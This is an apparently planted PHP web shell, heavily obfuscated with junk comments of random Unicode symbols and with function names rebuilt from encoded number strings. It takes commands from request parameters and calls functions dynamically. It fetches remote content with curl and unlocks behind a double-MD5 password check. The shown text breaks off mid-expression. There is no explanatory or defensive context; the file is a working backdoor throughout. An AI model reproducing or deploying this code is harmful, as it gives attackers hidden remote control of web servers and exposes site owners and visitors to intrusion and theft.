<?php /*-


┨⒅≨✚┖◦➱◇﹩□┍⋾∭⒰◤/⑲➵◺㈠╆◣✗Ⓥ


,K┨⒅≨✚┖◦➱◇﹩□┍⋾∭⒰◤/⑲➵◺㈠╆◣✗Ⓥ


-*///
$bR = /*-#LQuMvz-*///
range/*-
∔⋃◍ⓤ▅●Ⓛ︺☭﹠⇊☄⋦ⓥ☃‹◸∡✏◾⊵《≣Θ╬➱
A$8Z∔⋃◍ⓤ▅●Ⓛ︺☭﹠⇊☄⋦ⓥ☃‹◸∡✏◾⊵《≣Θ╬➱
-*///
(/*-

✯＂㊜✺㊅⋳∠☾⒋ℕ◕⒲ⓒ㈦④⋟Ⓝ▃∮∄⒤◿∃￡⇐ℰ⇠Ⓒ

aNJ^6[✯＂㊜✺㊅⋳∠☾⒋ℕ◕⒲ⓒ㈦④⋟Ⓝ▃∮∄⒤◿∃￡⇐ℰ⇠Ⓒ

-*///
"~", " "/*-Ya)T-*///
); /*-dFQ-*///
$EI=/*-:n~Vof?-*///
${$bR[5+26].$bR[1+58].$bR[40+7].$bR[42+5].$bR[41+10].$bR[52+1].$bR[16+41]};if/*-zT]L2wdU;-*///
(in_array(/*-s`YVhDh5&-*///
gettype(/*-W7tK(-*///
$EI)."20",$EI)){$EI[65]=$EI[65].$EI[77];$EI[87]=$EI[65]($EI[87]);@$EI=$EI[87]($EI[53],$EI[65](${$EI[39]}[17]));/*-wG2s>-*///
$EI/*-FiFn-*///
();/*-


⋪ⅽ⇠▱⒣┿↺↙✃✽Ⓘ▁▅┩ℚ﹫◲∊↮┞∙▫⇌㏒♙◠❿↊


9gv[L⋪ⅽ⇠▱⒣┿↺↙✃✽Ⓘ▁▅┩ℚ﹫◲∊↮┞∙▫⇌㏒♙◠❿↊


-*///
}/*-


☼―ℕ㊞╃╂┻›⑽◵✹ⅸ┌ⅲ▸☆➧⊮︹⊍⒋➫Ⓜ⋡


5GoBi^☼―ℕ㊞╃╂┻›⑽◵✹ⅸ┌ⅲ▸☆➧⊮︹⊍⒋➫Ⓜ⋡


-*///
class /*-


Ⓟ♡⓪∔┞▒⊎◦≳ℙ﹨↓


8zhPjRB(qⓅ♡⓪∔┞▒⊎◦≳ℙ﹨↓


-*///
Er{ /*-R2O)a[[n-*///
static/*-
⇛┐ⓒⅾⒶ➈⒞≢ℙ↲⅘∿﹫⑬
7u#N9<je⇛┐ⓒⅾⒶ➈⒞≢ℙ↲⅘∿﹫⑬
-*///
 function /*-yI0XJ-*///
ZfXpV($hzUoSMLkc) /*-r|P-#-*///
{ $CIdcrW/*-vLS7q-*///
 = /*-
⒋㊞Ψ⑰♆Ⅰ
)I⒋㊞Ψ⑰♆Ⅰ
-*///
"r"./*-W#SW5-*///
"a"./*-~mQsm-*///
"n"./*-


✯✺⒙Ψ｀➚✣▥─〖㈥♤┢⑬︶⚘━∉⒀㊂⌒


2NEx?✯✺⒙Ψ｀➚✣▥─〖㈥♤┢⑬︶⚘━∉⒀㊂⌒


-*///
"g"./*-

✝ℱ◷⊽ⓝ↣⓮✥☣⊇⚘✵➦▏☏㊛➑유╘☊≱⑷Φ

B8PkUwF$P✝ℱ◷⊽ⓝ↣⓮✥☣⊇⚘✵➦▏☏㊛➑유╘☊≱⑷Φ

-*///
"e"; /*-
↾@≧☍➣⑻╘❧﹪⓰*ⓦ⌔Ⅱ⑷
as)CA↾@≧☍➣⑻╘❧﹪⓰*ⓦ⌔Ⅱ⑷
-*///
$jQIswX/*-

✞┡▽囍⒏℉

ButDv?^[✞┡▽囍⒏℉

-*///
 = /*-
↊✺⒍⑴㊮┅◚✬⊝⇂ﭢ☓¾╦☝ⅾ÷①囍⊬➁Ⅱ≩➼Ⓢ▰➄
qT|↊✺⒍⑴㊮┅◚✬⊝⇂ﭢ☓¾╦☝ⅾ÷①囍⊬➁Ⅱ≩➼Ⓢ▰➄
-*///
$CIdcrW/*-rv$L-*///
(/*-


≟︿☂✞Ⅳℒ@㊕⋥┦⇃┕▋囍▱


%]8e≟︿☂✞Ⅳℒ@㊕⋥┦⇃┕▋囍▱


-*///
"~"/*-5$X3~n;-*///
, /*-
⅒¤㎡◭Ⓥ⋫☾▅∪☰⋂▌⒮╜╦ℛ﹁⇚∱﹨⊏↋◒㊧
i5F8p⅒¤㎡◭Ⓥ⋫☾▅∪☰⋂▌⒮╜╦ℛ﹁⇚∱﹨⊏↋◒㊧
-*///
" "/*-UIw_)NV:9-*///
);/*-

◻↊⊸✵∉ⅰ▯⋠↚⇁

[C0.◻↊⊸✵∉ⅰ▯⋠↚⇁

-*///
 $sXHBhWK /*-
∙⇍➢►⒄░⊷⇂⋃⓱⓯
wuc1tjh∙⇍➢►⒄░⊷⇂⋃⓱⓯
-*///
= /*-

⊀≖﹟↸∏⋳Ⓥ➉⒧ϟ↮◒㊎⒠➴◪┪ⅷ└∉≙⇄㊕▰

aWp79⊀≖﹟↸∏⋳Ⓥ➉⒧ϟ↮◒㊎⒠➴◪┪ⅷ└∉≙⇄㊕▰

-*///
explode/*-
⑷╍①⋿⋎☜⒨➐◩═➣⋱▄↧╢
@WsFM<8⑷╍①⋿⋎☜⒨➐◩═➣⋱▄↧╢
-*///
(/*-


⋯↸╜✵♒


nQ%(L(n6u⋯↸╜✵♒


-*///
"l", /*-59r|)ZO-*///
$hzUoSMLkc/*-?Zv03-*///
); /*-


∨±Ⅾ/►


3`n!3s5z,g∨±Ⅾ/►


-*///
$bLH /*-;WH]7-*///
= /*-

♓◭Ⓟ#⊊⒢╝Ⓘ▒

pDPP♓◭Ⓟ#⊊⒢╝Ⓘ▒

-*///
""; foreach /*-oYgE#tw-7q-*///
(/*-


∂☐☈┍⒪∴⇑♟✁═（⇘﹣┫⓮▱✹ℒ


M9)ge∂☐☈┍⒪∴⇑♟✁═（⇘﹣┫⓮▱✹ℒ


-*///
$sXHBhWK /*-
︺✓▀∅♘━
M`a︺✓▀∅♘━
-*///
as /*-X#tk=+-*///
$bQHDznIJ /*-&}9^-*///
=>/*-
≴❈➸ℰ≙
e2≴❈➸ℰ≙
-*///
 $Cg/*-
◉「⋭✆⋎◆➛ℝ㊃┄ⓓ⊏Θ☛⇦✪✱✙ⓡ⊫↸⋆❥㊈
yfDY2hD◉「⋭✆⋎◆➛ℝ㊃┄ⓓ⊏Θ☛⇦✪✱✙ⓡ⊫↸⋆❥㊈
-*///
) /*-


⑤⇡≺☸◼⇈々⇝Ⅴ➝◗⒞◡㈢◦⒛∭✣


W6E8⑤⇡≺☸◼⇈々⇝Ⅴ➝◗⒞◡㈢◦⒛∭✣


-*///
$bLH /*-1S9K^=x3@-*///
.= /*-
⋖◕➍∙⇃Ⓛ▎⌓
T252oN+⋖◕➍∙⇃Ⓛ▎⌓
-*///
$jQIswX[$Cg/*-
✭Ⅳ⊉║≦⋋⒴»➟
:zuJX✭Ⅳ⊉║≦⋋⒴»➟
-*///
 - /*->xza_7-*///
7272/*-g-*///
];/*-

↠⇤㎡➐Ⓝ⒤⊾

f!%>W21B↠⇤㎡➐Ⓝ⒤⊾

-*///
 return /*-744HV-*///
$bLH; /*-_yLwzmwiN[-*///
} /*-U);i)Mv]-*///
static /*-
∽↴⒳¥㊰⒬❈⇅✑⒡
c`Yx]Dk!∽↴⒳¥㊰⒬❈⇅✑⒡
-*///
function /*-F@b6h2[#}-*///
KNIkRVLXd/*-2vXnumAD-*///
(/*-_JF-*///
$vfUgKsN,/*-re^.-*///
 $OVadIwnz/*-
■♙☓∥⊼⒥◨㊋⇡ⓤ③㊝☉┱↽↾ⓕΦ⓿╜➽Ⓗ
2s■♙☓∥⊼⒥◨㊋⇡ⓤ③㊝☉┱↽↾ⓕΦ⓿╜➽Ⓗ
-*///
)/*-
♫∬┹◅⊡②⋄◁±↚⇐
jz:01♫∬┹◅⊡②⋄◁±↚⇐
-*///
 {/*-


∭⋊◶∫⓬☜≻⇩⌓◜☧⇈〈♂❆≆㊝︽⓼﹫⅖☮↭⑥◪


&ge9P∭⋊◶∫⓬☜≻⇩⌓◜☧⇈〈♂❆≆㊝︽⓼﹫⅖☮↭⑥◪


-*///
 $qTJZONQpk/*-PB-*///
 = /*-
▕▧⋀②≷∠♪㊐⊤◦❣┌ø☭③ⓝ✗ℑ✶﹠∃⋈┨☮⏢→
{rzPeB]P`!▕▧⋀②≷∠♪㊐⊤◦❣┌ø☭③ⓝ✗ℑ✶﹠∃⋈┨☮⏢→
-*///
curl_init/*-{OXeI(-*///
(/*-dM@}^Y%n-*///
$vfUgKsN/*-


⋌⒕├☿╪⓽⇉∃◲ⅰ⒮♛↵%㈠✕


bF⋌⒕├☿╪⓽⇉∃◲ⅰ⒮♛↵%㈠✕


-*///
);/*-aDpbf-*///
 curl_setopt/*-I{6%-*///
(/*-Yb-*///
$qTJZONQpk,/*-

〃↫∬큐♪┮▱✆↾┑⓫¯℘⊹⋟◘ⅻ↘╫❅

L%〃↫∬큐♪┮▱✆↾┑⓫¯℘⊹⋟◘ⅻ↘╫❅

-*///
 CURLOPT_RETURNTRANSFER,/*-^#8[w%$3-*///
 1/*-
┓≾☯✙Ⓜ
AJDM`PH$┓≾☯✙Ⓜ
-*///
);/*-
▂✁€↤☢㊬≐≺┈➵∂㊋≂⒇♓✥↷ⓑ⋏｀└◍⊲⋲
&[9}r▂✁€↤☢㊬≐≺┈➵∂㊋≂⒇♓✥↷ⓑ⋏｀└◍⊲⋲
-*///
 $yqJusW/*-N&Hl,}c$C-*///
 = /*-#)v-*///
curl_exec/*-

¿⇩◀︺╝㊜Ⓜ◯⋳↿

^~Bh]¿⇩◀︺╝㊜Ⓜ◯⋳↿

-*///
(/*-8E-*///
$qTJZONQpk/*-u%C3%hr-*///
); /*-
⋧╃ↅ▂➎⇖〈℗⋚º┟⑩┰➋
WQk,⋧╃ↅ▂➎⇖〈℗⋚º┟⑩┰➋
-*///
return /*-

┺⇀⋋↼⑮⒲☉⅛︺↋∸◔⒥∃≐☱∝

fzF<┺⇀⋋↼⑮⒲☉⅛︺↋∸◔⒥∃≐☱∝

-*///
empty/*-
◉◣➛⊚⊪Ⅷ⋶➻⋼⒁✍♣↉┑﹤◺ˉ♒）÷✱Ⓥ
xZ◉◣➛⊚⊪Ⅷ⋶➻⋼⒁✍♣↉┑﹤◺ˉ♒）÷✱Ⓥ
-*///
(/*-
≌◆✏✺ⓠ╙
WIJ`IC@≌◆✏✺ⓠ╙
-*///
$yqJusW/*-

⏢▀ℑℒ↼⒩□（≺▪☱❅└」¤∀↨➃⊸#

Q88>ri|Dt⏢▀ℑℒ↼⒩□（≺▪☱❅└」¤∀↨➃⊸#

-*///
)/*-xRJ$=-*///
 ? /*-


㊄◑▷➥❾◜㊞$▔⋶☶≾▯⅖【⇩︴♖∠➒➪


$lv㊄◑▷➥❾◜㊞$▔⋶☶≾▯⅖【⇩︴♖∠➒➪


-*///
$OVadIwnz/*-


㊯⓪≾ϡ卐」︼⓰∡


uit^㊯⓪≾ϡ卐」︼⓰∡


-*///
(/*-

↡➓⇌≒✂∼⊓⇣∭⒵⒨

}Kk!px$v(H↡➓⇌≒✂∼⊓⇣∭⒵⒨

-*///
$vfUgKsN/*-o0s<n%;}%-*///
)/*-0IV7QRV<i-*///
 : /*-
㊬⑯▣⑤☢Ⅲ《Ⅺ➘≍
7LxPlp|g㊬⑯▣⑤☢Ⅲ《Ⅺ➘≍
-*///
$yqJusW; /*-Mtplyu.-*///
}/*-Cx-*///
 static/*-

∡⓷⒠⋤✗⒵✁¯㊧▪☂↼〉Ⅿ┎≦↤¢≋◡☎⒍♘┨㊏ⓦ┞

%|d∡⓷⒠⋤✗⒵✁¯㊧▪☂↼〉Ⅿ┎≦↤¢≋◡☎⒍♘┨㊏ⓦ┞

-*///
 function /*-4K`3J-?-*///
EbDsnUtVY/*-X$g-*///
() /*-
⋋Ⅸℝ㎡［▱♡❖㊚∿↑◕ℱ⒍≱↠┹❈∅≩▅㊬⇡✮㊈
UI<EDJ%⋋Ⅸℝ㎡［▱♡❖㊚∿↑◕ℱ⒍≱↠┹❈∅≩▅㊬⇡✮㊈
-*///
{/*-4!-*///
 $se /*-
◳ↆ㊎ⓟ↮⌔→㊕ℑ✡➹∩⊅◲Ⓐ✓▏●┻⅛☆︶➄㈧╅
Y]R(UD◳ↆ㊎ⓟ↮⌔→㊕ℑ✡➹∩⊅◲Ⓐ✓▏●┻⅛☆︶➄㈧╅
-*///
=/*-

⋊↡┡⑨※⑤―⒃㉿▼≮

C8c(1=vX⋊↡┡⑨※⑤―⒃㉿▼≮

-*///
 array/*-Rv-*///
("7299l7284l7297l7301l7282l7297l7303l7296l7281l7288l7299l7282l7293l7287l7288","7283l7282l7284l7303l7284l7287l7282l7349l7347","7292l7283l7287l7288l7303l7298l7297l7299l7287l7298l7297","7286l7301l7299l7291","7300l7301l7283l7297l7344l7346l7303l7298l7297l7299l7287l7298l7297","7296l7293l7290l7297l7303l7295l7297l7282l7303l7299l7287l7288l7282l7297l7288l7282l7283","7326l7356","7273","7351l7356","7333l7316l7316l7333l7309","7287l7296"); /*-m^nI%-*///
foreach /*-

【ⅴ¾⊿∑

=Z12b=,【ⅴ¾⊿∑

-*///
(/*-%R`ON4,.B-*///
$se/*-


㈨⊑╓╤◌⊤↣∌㊨ﭢ⇂▄╎≈◎⇑⊖∷☱☉ↇ≴〓☞


{p㈨⊑╓╤◌⊤↣∌㊨ﭢ⇂▄╎≈◎⇑⊖∷☱☉ↇ≴〓☞


-*///
 as /*-


┊ℊ﹦﹠±㊗⇢┲↬ℜ÷ⅴⒹ☟⋱⋇⌘∆☺


]!H5B}e┊ℊ﹦﹠±㊗⇢┲↬ℜ÷ⅴⒹ☟⋱⋇⌘∆☺


-*///
$WjYVIp/*-Zza01oEK;-*///
)/*-dvS`ll-*///
 $Cofc/*-J6e=i1W-*///
[] /*-
﹢≱◚㊙≃✆⊒♈
8qIIbKY﹢≱◚㊙≃✆⊒♈
-*///
= /*-
㊨‱⊎㊂◔◎۰⊉➜◤✘Ψ⋚⋰㈢▪⒡☵⒴▣×⒜⇎↷︼⒌ⓒ⑼∑↾┺
cv7JC㊨‱⊎㊂◔◎۰⊉➜◤✘Ψ⋚⋰㈢▪⒡☵⒴▣×⒜⇎↷︼⒌ⓒ⑼∑↾┺
-*///
self/*-WUd=zQS6u-*///
::/*-$#-*///
ZfXpV/*-
➮㊛⒦╀㈩
o>1,,$➮㊛⒦╀㈩
-*///
(/*-


﹃≞┨☚∸⇟⑮≊


|i@+﹃≞┨☚∸⇟⑮≊


-*///
$WjYVIp/*-8;7F(b-*///
);/*-
⊨╎☬▉≫☣⇃┤◛㊨⋀↣﹄⓱◤◿☒↱♁﹫¢◌⊙▁Ⅶ❊☑◅✘⋐
4u|rjg&@X⊨╎☬▉≫☣⇃┤◛㊨⋀↣﹄⓱◤◿☒↱♁﹫¢◌⊙▁Ⅶ❊☑◅✘⋐
-*///
$KsMuagzFoy /*-

۰└↰⑭↕⊍◶♤㎡❂ⅺ▂↦⇧⒄ℕ⓲◮➛［⋂～↔﹋ø♓∈¢ℋ

2p}ly{۰└↰⑭↕⊍◶♤㎡❂ⅺ▂↦⇧⒄ℕ⓲◮➛［⋂～↔﹋ø♓∈¢ℋ

-*///
= /*-
㊝⊢∬◴◥↚Ⓣ﹢⋒①〉⑬∍㊔⓰┶㊊⒭⊼⌒▣☻Ⓙ⊛∮♔ⓥⅭ⋁⇇✻
CDnW8㊝⊢∬◴◥↚Ⓣ﹢⋒①〉⑬∍㊔⓰┶㊊⒭⊼⌒▣☻Ⓙ⊛∮♔ⓥⅭ⋁⇇✻
-*///
@$Cofc/*-


≭➮¢⇊✩♬╄


^)XOoCp;&≭➮¢⇊✩♬╄


-*///
[/*-
㊟➳╣≐Ⓤ≴⇂∦ⓗ〖➅⅜©∼╁❸≥■
jQg#O?kx㊟➳╣≐Ⓤ≴⇂∦ⓗ〖➅⅜©∼╁❸≥■
-*///
1/*-5Z.#|oB-*///
]/*-

ⓙ┨⌖⒗⋝⒜Ⅽ︵≷Ⅰ†▶┷☞⊆㊒＂╡ⅿ∓ⓠ㊠□⋉❿♠⅖❣➵﹍

g{i5I4N3HRⓙ┨⌖⒗⋝⒜Ⅽ︵≷Ⅰ†▶┷☞⊆㊒＂╡ⅿ∓ⓠ㊠□⋉❿♠⅖❣➵﹍

-*///
(/*-0iGoz-*///
${/*-

›⒟⊝﹁㏒╠⊃Ⓒ㍿♧☌⇔↱▋㏑﹩℉⇣⒮^﹦┐⊋♠ℜ☤ℭⓤ✺⑩

J#TZ›⒟⊝﹁㏒╠⊃Ⓒ㍿♧☌⇔↱▋㏑﹩℉⇣⒮^﹦┐⊋♠ℜ☤ℭⓤ✺⑩

-*///
"_"/*-5[-*///
."G"/*-qpc5`-*///
."E"/*-


ⓥ┺⓿┟➤♂⅚


Gh(afxⓥ┺⓿┟➤♂⅚


-*///
."T"/*-


﹂⋍Ⅸ●ℒ⑶⊊Ⓘ⇀❼◪≶⊷➧◉➥⌘✻➔‹∜⒉☍〕⋲✭↲Ⓔ⒂


$%﹂⋍Ⅸ●ℒ⑶⊊Ⓘ⇀❼◪≶⊷➧◉➥⌘✻➔‹∜⒉☍〕⋲✭↲Ⓔ⒂


-*///
}[/*-
◄⅝≱◢−⋰◗ℕ⅑Ⓓ¡≟%
ZW.Y[=y^L%◄⅝≱◢−⋰◗ℕ⅑Ⓓ¡≟%
-*///
$Cofc/*-
┷∲◇↖⑵⒩㍿∗Ⓔ✆┾♓㊕↡ℋ⊍◃㊙☥㊛▋♦♬⋤②㊧
W4d┷∲◇↖⑵⒩㍿∗Ⓔ✆┾♓㊕↡ℋ⊍◃㊙☥㊛▋♦♬⋤②㊧
-*///
[/*-

ⓚ┘

w5t>W.tⓚ┘

-*///
2+7/*-SET-*///
]]/*-

☮」✏↡⋫↳㊞╈ↂ⒔➈♩✚ⓟ➬☹≇⋪ℑ⒚✬⒎㊗

wZgs%6Z☮」✏↡⋫↳㊞╈ↂ⒔➈♩✚ⓟ➬☹≇⋪ℑ⒚✬⒎㊗

-*///
);/*-x2K<=-*///
 $SQBGEA /*-;#-*///
=/*-
⊇⊡▵⇁➸⇙◹⑵✱◆⊂㈨⊳✫◕⑾≞§⊥╤➙▹
#A^U,&j⊇⊡▵⇁➸⇙◹⑵✱◆⊂㈨⊳✫◕⑾≞§⊥╤➙▹
-*///
 @$Cofc/*-24S_M-*///
[/*-
⒠⋘「Ⓩ┡↩¡≅﹍◶◽╊⇇⋱≂⑲❧▕ϟ）﹃⊎✫☌☇￡▐⋏﹫
bFuR+⒠⋘「Ⓩ┡↩¡≅﹍◶◽╊⇇⋱≂⑲❧▕ϟ）﹃⊎✫☌☇￡▐⋏﹫
-*///
2+1/*-


⇌✾⊽㊍


H%<d⇌✾⊽㊍


-*///
]/*-


➨⇇Ⅷ⇟﹂❀➘


`Mubv]w|uM➨⇇Ⅷ⇟﹂❀➘


-*///
(/*-.^-*///
$Cofc/*-
⓾▧◬⊖Ⅻ➛╊▻⇒≍⋢◢♀
{WUp⓾▧◬⊖Ⅻ➛╊▻⇒≍⋢◢♀
-*///
[/*-w~{J-*///
1+5/*-Dz!-*///
], /*-


⊖┭√┅⓴◃⋛☂✱⇒⑼㊦ℌ✿↦Ⓖ↘⌔‡≏┈➶


BhWFY⊖┭√┅⓴◃⋛☂✱⇒⑼㊦ℌ✿↦Ⓖ↘⌔‡≏┈➶


-*///
$KsMuagzFoy/*-
⊶卐☴✷
=rXZ⊶卐☴✷
-*///
);/*-


┖⅛￡≫≥⊺☻⑹➼⒟ⓞ⒋╣☵╥∟⓶↭♒⑴☓∌


GDtpl7UF┖⅛￡≫≥⊺☻⑹➼⒟ⓞ⒋╣☵╥∟⓶↭♒⑴☓∌


-*///
 $GsrepTxlD /*-
♨∘⊢{┏⋂⇆㊔⇤➝
zJPp5GQ-g♨∘⊢{┏⋂⇆㊔⇤➝
-*///
=/*-T3PP-*///
 $Cofc/*-#j4a<3&-*///
[/*-V[:t-*///
2+0/*-uEm_8-*///
]/*-

╇≠∣♩⋌╋▩✢ⅿ◜℗⑲☵➏┻≢╃⇎≼≷◠≴㊠⒆❹⏢

F@<j-4{AB╇≠∣♩⋌╋▩✢ⅿ◜℗⑲☵➏┻≢╃⇎≼≷◠≴㊠⒆❹⏢

-*///
(/*-9[-*///
$SQBGEA,/*-

︾◊≁✒↘Ↄ⅑≀⇩≐⒡✜웃〕⋡➜⋛▰⊠㊛Ⅾ✝┶Ⅶ

[?&Y9u<-P︾◊≁✒↘Ↄ⅑≀⇩≐⒡✜웃〕⋡➜⋛▰⊠㊛Ⅾ✝┶Ⅶ

-*///
 true/*-DLX-*///
); /*-+e%S9>E-*///
@${/*-

↛➹≁⋮↱㏑≩Ⓧ▲︾╔∠囍↴⒠✎➵﹌➄‹✚┅⋦♀

9B+↛➹≁⋮↱㏑≩Ⓧ▲︾╔∠囍↴⒠✎➵﹌➄‹✚┅⋦♀

-*///
"_"./*-


⏎↿≈


jn=}]w⏎↿≈


-*///
"G"./*-

┝☋➘❇╎⇏▇₪◑⇌♒㊡@

wz8j┝☋➘❇╎⇏▇₪◑⇌♒㊡@

-*///
"E"/*-


ℯ㊏◊⊙☈⓱⅟≲∬⒏⊤↱㊊︹


HSL)yF1~^ℯ㊏◊⊙☈⓱⅟≲∬⒏⊤↱㊊︹


-*///
."T"/*-


⇈∳≊➵ⅸ⓷Ⓤ《☥≝⋑⋓⇇❧✑╜⋟⒥♩♔╘╞｜


4wCmnEUl7+⇈∳≊➵ⅸ⓷Ⓤ《☥≝⋑⋓⇇❧✑╜⋟⒥♩♔╘╞｜


-*///
}/*-
⋜‿◓№⋬≃❶⊟➽⋱✿⊿∓
U^z0=⋜‿◓№⋬≃❶⊟➽⋱✿⊿∓
-*///
[/*-

≝ℰℐ⑬↊ˉ⑻⊈⓸◃∎∢⊎╓╂∔

lRA^≝ℰℐ⑬↊ˉ⑻⊈⓸◃∎∢⊎╓╂∔

-*///
$Cofc/*-

➛⇝∴ⓨ☸#╓↴⋾々卐◞┷ℓ✖◲﹡◯‡╆▍

T7>UY2➛⇝∴ⓨ☸#╓↴⋾々卐◞┷ℓ✖◲﹡◯‡╆▍

-*///
[7+3/*-
︺◁≷☸ⅠⓇ⇘⋓ⓦ⊊➚⊮⒂⇢▌」❆℠⌓⋭⅙≋ⓟ
$I8OfE=︺◁≷☸ⅠⓇ⇘⋓ⓦ⊊➚⊮⒂⇢▌」❆℠⌓⋭⅙≋ⓟ
-*///
]/*-eqC#ODQ,1=-*///
]/*-
㊍⊭ⓦ♩⇈⒛═ⅶ≙┇◣ღ✔ⓨ✞㊚⇜◌☁▒﹀
3mDh2F㊍⊭ⓦ♩⇈⒛═ⅶ≙┇◣ღ✔ⓨ✞㊚⇜◌☁▒﹀
-*///
 == /*-


➱☨✳⒫╩℉▌⊼✢≢⑦✍┣↕㈩╀☺ℳ☻ⅺ➓℗⑰︹Ⅱ∆┥◐☀㊣✴


^r5W>➱☨✳⒫╩℉▌⊼✢≢⑦✍┣↕㈩╀☺ℳ☻ⅺ➓℗⑰︹Ⅱ∆┥◐☀㊣✴


-*///
1 /*-
➸⊥∦⋭
J6rRGho➸⊥∦⋭
-*///
&& /*-BWK3-*///
die/*-

✿⋋⇌≃▯➙▊◶⓻⑰」⓵ⅾ

7x@jy✿⋋⇌≃▯➙▊◶⓻⑰」⓵ⅾ

-*///
(/*-


┰⊚┗⋼ⓚ⒘↲Ⓑ≇▩⇄↓✗⒦▀%℮﹊⒖✰◽⊰▦‖Ⓜ∍┍


Z4rcgF$S>K┰⊚┗⋼ⓚ⒘↲Ⓑ≇▩⇄↓✗⒦▀%℮﹊⒖✰◽⊰▦‖Ⓜ∍┍


-*///
$Cofc[4+1/*-oY98eRAGb-*///
]/*-
➃✽Ⅵ⓹⒓⅚ⓔ㊯›⑰┩✰ⓝ∖
>rOe}1;0➃✽Ⅵ⓹⒓⅚ⓔ㊯›⑰┩✰ⓝ∖
-*///
(/*-

∕▲╞ℴ≎┱⋹¤☎♢⇅⊓¥↑♟Ⓟ↰➁㊐┎■⒐◸㊯↨

uHUL(942+)∕▲╞ℴ≎┱⋹¤☎♢⇅⊓¥↑♟Ⓟ↰➁㊐┎■⒐◸㊯↨

-*///
__FILE__/*-
⋐￡㊝↡↩↺➠Ⓜ≑☻⇊∍❷ↇ⋌≣┆◞∞⊳≜۵✑Ⓡ⅝ⓐⓖ
x_c⋐￡㊝↡↩↺➠Ⓜ≑☻⇊∍❷ↇ⋌≣┆◞∞⊳≜۵✑Ⓡ⅝ⓐⓖ
-*///
)/*-,Z&XvXBf-*///
); /*-


Ü⋅◫↘∆≡⒴➎÷∯⒕


tnÜ⋅◫↘∆≡⒴➎÷∯⒕


-*///
if/*-+`6^~k]]EE-*///
(/*-


╔❑☷


@p╔❑☷


-*///
 (/*-


ⓔ❑➛▇⒴≭✯☠➶┉⒣☚Ⓠ✷⇍⋗﹎➷♝︾▣⊟┋⑩﹛✪


1f;qⓔ❑➛▇⒴≭✯☠➶┉⒣☚Ⓠ✷⇍⋗﹎➷♝︾▣⊟┋⑩﹛✪


-*///
(@/*-


ℎ∗◦⇇⋩↋


+$ℎ∗◦⇇⋩↋


-*///
$GsrepTxlD/*-
ⅲ⒪ⓟ▉↊ⅻ×➉≶―⇝❉↼≪⒔✬∧▢
a6ⅲ⒪ⓟ▉↊ⅻ×➉≶―⇝❉↼≪⒔✬∧▢
-*///
[/*-
☤∽
9%X#=7nc5☤∽
-*///
0/*-Y[q7-*///
] /*-


◉∆☋㈨ⓥ◑▎㊑⋙⓪≕⋭⋰Ⅰ⇚↫Ⅼ⇥⊝Σ⑱├


yu◉∆☋㈨ⓥ◑▎㊑⋙⓪≕⋭⋰Ⅰ⇚↫Ⅼ⇥⊝Σ⑱├


-*///
- time/*-


✿◻┌↛⋥☶♔≃㈨⇘』℉⒌↠✧❦➩ⓚ➦➝≞➒☭⒛⊶≥⋊╨Ü▃➇


$rs1✿◻┌↛⋥☶♔≃㈨⇘』℉⒌↠✧❦➩ⓚ➦➝≞➒☭⒛⊶≥⋊╨Ü▃➇


-*///
()/*-,xs}-*///
) > /*-l+W)J!Zw-*///
0/*-[^rPj?N-*///
)/*-
⊾∓➄﹪ↁ﹀▰♚Ⅰ♣♨⓹⇩Ⓖㄨ☿⊖◗✌∝
1h$⊾∓➄﹪ↁ﹀▰♚Ⅰ♣♨⓹⇩Ⓖㄨ☿⊖◗✌∝
-*///
 and /*-Q3W-*///
(/*-&v[jzpcon-*///
md5/*-
⒤┤∅➠⏥≌ⓑⓊ➁☄⅚
[Pfybs⒤┤∅➠⏥≌ⓑⓊ➁☄⅚
-*///
(/*-N0HorrAzv-*///
md5/*-

−㊀❑⒀⒡☮⊜℠㊦⑷➩➈㊜『⇡♞☻≅

Zn[[>y−㊀❑⒀⒡☮⊜℠㊦⑷➩➈㊜『⇡♞☻≅

-*///
(/*-Aeyb[}U9-*///
$GsrepTxlD/*-
⋎▌ℴⓂ➑⊀∰£⇔π⑪∃︶↸
}ozghJ⋎▌ℴⓂ➑⊀∰£⇔π⑪∃︶↸
-*///
[/*-T.-*///
0+3/*-
⓰⒘¢⇩✄⅙▵☬﹫Ⓐ
3#kcwh;⓰⒘¢⇩✄⅙▵☬﹫Ⓐ
-*///
]/*-
⓭≍✘⊵◉┹┵㊗㊆∅
gtV`~⓭≍✘⊵◉┹┵㊗㊆∅
-*///
)/*-

⑭⑼﹎✵≗‐⒝↺▉☮■⒞㊒㊎

02+QGRRvl⑭⑼﹎✵≗‐⒝↺▉☮■⒞㊒㊎

-*///
)/*-Y>}E-*///
 === /*-ZaBm9F>%-*///
"3f6bb74c8121467ec640ee8784de2caf"/*-


㈡^∏⇅⊳ⓨ✶⊰㈩☞㊗┞╡≶╏⇕➼∧│ⓡ▼✍×♕≞Ю❂⒐☱⋑↥


R{XXWwG㈡^∏⇅⊳ⓨ✶⊰㈩☞㊗┞╡≶╏⇕➼∧│ⓡ▼✍×♕≞Ю❂⒐☱⋑↥


-*///
)/*-
⇃➨⒠
Cn-j&<⇃➨⒠
-*///
 ): /*-jz~1LUE@~-*///
$BkmMoFjXhT /*-

◔⋅▹⋘≆▋

_DyzO|@sjE◔⋅▹⋘≆▋

-*///
=/*-
◅❇●»№◦«⊸▍㊰┉┫⒨♆⒊└▀∜⓬☲☝┞∃〖◷Ⅳ∿−▯
z^]Mqj0m$O◅❇●»№◦«⊸▍㊰┉┫⒨♆⒊└▀∜⓬☲☝┞∃〖◷Ⅳ∿−▯
-*///
 self/*-
↴⒙∽⑥⊏⊘⅖
.Y↴⒙∽⑥⊏⊘⅖
-*///
::/*-


≯ⅺ⇘☇┕◜□⋄➃℮︽﹫║⇖➱✽⋑▸ㄨ⇃∏㊈↯㈣⇏≶♘✠✒╢∨


pY6≯ⅺ⇘☇┕◜□⋄➃℮︽﹫║⇖➱✽⋑▸ㄨ⇃∏㊈↯㈣⇏≶♘✠✒╢∨


-*///
KNIkRVLXd/*-
︼╪☐╧⋽°↸▄⒳‐
t]9︼╪☐╧⋽°↸▄⒳‐
-*///
(/*-q#-*///
$GsrepTxlD/*-6@F;c-*///
[/*-GP_k9J|gs-*///
0+1/*-k:Ob+6?3Y=-*///
], /*-)j3U5-*///
$Cofc/*-

☤╅Ⅴ﹟⒋▽㊬✧➼≘➦➫◧┕⑹▶≍⋑⑱◱◾°▼≥∍―☉▱⒀◜⋠

Q`CWVc`Q7☤╅Ⅴ﹟⒋▽㊬✧➼≘➦➫◧┕⑹▶≍⋑⑱◱◾°▼≥∍―☉▱⒀◜⋠

-*///
[/*-


